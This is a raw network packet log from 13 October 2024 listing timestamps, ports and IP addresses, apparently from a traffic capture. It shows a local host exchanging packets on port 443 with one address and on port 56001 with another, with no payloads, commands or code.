Oct 13, 2024 18:15:23.370143890 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.370220900 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.370268106 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.370424032 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.370424986 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.370424986 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.370457888 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.370522976 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.417731047 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.417747021 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.417824030 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.418102980 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.418102980 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.418174028 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.418329000 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.418349028 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.418401957 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.418418884 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.418452978 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.418787956 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.418802023 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.418863058 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.418878078 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.419226885 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.419245005 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.419285059 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.419303894 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.419331074 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.419748068 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.419761896 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.419815063 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.419836044 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.419858932 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.420167923 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.420186043 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.420222998 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.420239925 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.420268059 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.460835934 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.460848093 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.461057901 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.461071968 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.503264904 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.525389910 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.525398016 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.525477886 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.525515079 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.525566101 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.525566101 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.525630951 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.525681973 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.525909901 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.525928020 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.525966883 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.525983095 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.526016951 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.526365995 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.526379108 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.526429892 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.526447058 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.526834965 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.526854992 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.526889086 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.526906967 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.526937962 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.527266979 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.527280092 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.527323961 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.527338028 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.527756929 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.527777910 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.527826071 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.527841091 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.551565886 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.551578999 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.551748037 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.551810980 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.551953077 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.551969051 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.552042007 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.552042961 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.552066088 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.596828938 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.616508007 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.616522074 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.616605043 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.616741896 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.616741896 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.616811037 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.616982937 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.617001057 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.617039919 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.617063046 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.617086887 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.617371082 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.617383957 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.617429018 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.617444038 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.617465019 CEST	443	49743	54.231.232.1	192.168.2.4
Oct 13, 2024 18:15:23.617512941 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:23.619710922 CEST	49743	443	192.168.2.4	54.231.232.1
Oct 13, 2024 18:15:48.801810026 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:15:48.806766033 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:15:48.806823969 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:15:48.811924934 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:15:49.213010073 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:15:49.253118038 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:15:49.385926962 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:15:49.391031981 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:15:49.396387100 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:15:49.396450043 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:15:49.402395010 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:25.801105976 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:25.805943966 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:25.806201935 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:25.810981989 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:26.212496996 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:26.253129005 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:26.386313915 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:26.388900995 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:26.393870115 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:26.393979073 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:26.398786068 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:29.731021881 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:29.784411907 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:29.902219057 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:29.906208992 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:29.911020994 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:29.911127090 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:29.915925026 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.159792900 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:30.380156040 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.380228996 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:30.385193110 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.524205923 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.524466038 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.524490118 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.524502993 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.524516106 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:30.524571896 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:30.524754047 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.524811983 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.524827003 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.524842024 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.524854898 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:30.524907112 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:30.525588036 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.525636911 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.525656939 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.525674105 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.525686026 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:30.525726080 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:30.526458025 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.526479006 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.526498079 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.526518106 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:30.583431005 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:30.841875076 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.841907978 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.841922045 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.841938019 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.841952085 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.841978073 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:30.841978073 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:30.842022896 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.842036963 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.842057943 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.842073917 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.842082024 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:30.842116117 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:30.842152119 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.842174053 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.842189074 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.842204094 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.842220068 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.842206955 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:30.842251062 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:30.842308998 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:30.842323065 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.842338085 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.842351913 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.842366934 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.842395067 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:30.842421055 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:30.842607975 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.842622042 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.842636108 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.842658043 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.842672110 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.842684984 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.842686892 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:30.842700005 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.842709064 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:30.842714071 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.842729092 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.842744112 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:30.842763901 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:30.842892885 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.842927933 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.842941999 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.842950106 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:30.842953920 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.842979908 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:30.842993975 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.842998981 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:30.843079090 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.843138933 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:30.846982956 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.847071886 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:30.847104073 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.847117901 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.847152948 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.847204924 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:30.847321987 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.847336054 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.847356081 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.847412109 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.847414017 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:30.847426891 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.847445011 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:30.847563028 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:30.848232031 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.848246098 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.848259926 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.848301888 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.848319054 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.848331928 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:30.848500013 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:30.849121094 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.849134922 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.849148989 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.849167109 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.849180937 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.849191904 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:30.849241018 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:30.850079060 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.850092888 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.850106955 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.850130081 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.850143909 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.850157976 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:30.850181103 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:30.850934982 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.850980043 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.850994110 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.851011038 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:30.851042986 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.851051092 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:30.851058006 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.851128101 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:30.852013111 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.852026939 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.852041006 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.852092981 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:30.852099895 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.852118015 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.852200985 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:30.852811098 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.852824926 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.852838993 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.852853060 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.852866888 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.852880955 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:30.852907896 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:30.852907896 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:30.853594065 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.853607893 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.853622913 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.853638887 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.853658915 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.853672981 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:30.853703022 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:30.854475975 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.854489088 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.854581118 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:30.906610966 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.906625986 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.906640053 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.906678915 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:30.906706095 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.906718969 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.906733990 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.906800985 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:30.906810045 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.906824112 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.906837940 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.906852007 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.906867027 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.906898022 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:30.906898022 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:30.906979084 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.906992912 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.907006025 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.907021999 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.907037020 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:30.907083988 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:30.907104969 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.907152891 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.907166958 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.907250881 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.907250881 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:30.907264948 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.907279968 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.907294035 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.907305002 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:30.907418013 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.907423973 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:30.907461882 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.907485008 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.907545090 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:30.907589912 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.907634974 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.907649994 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.907665968 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:30.907697916 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:30.907704115 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.907718897 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.907733917 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.907763958 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:30.907879114 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.907891989 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.907907009 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.907921076 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.907936096 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.907944918 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:30.907944918 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:30.907951117 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:30.908102036 CEST	49732	56001	192.168.2.4	31.41.244.211
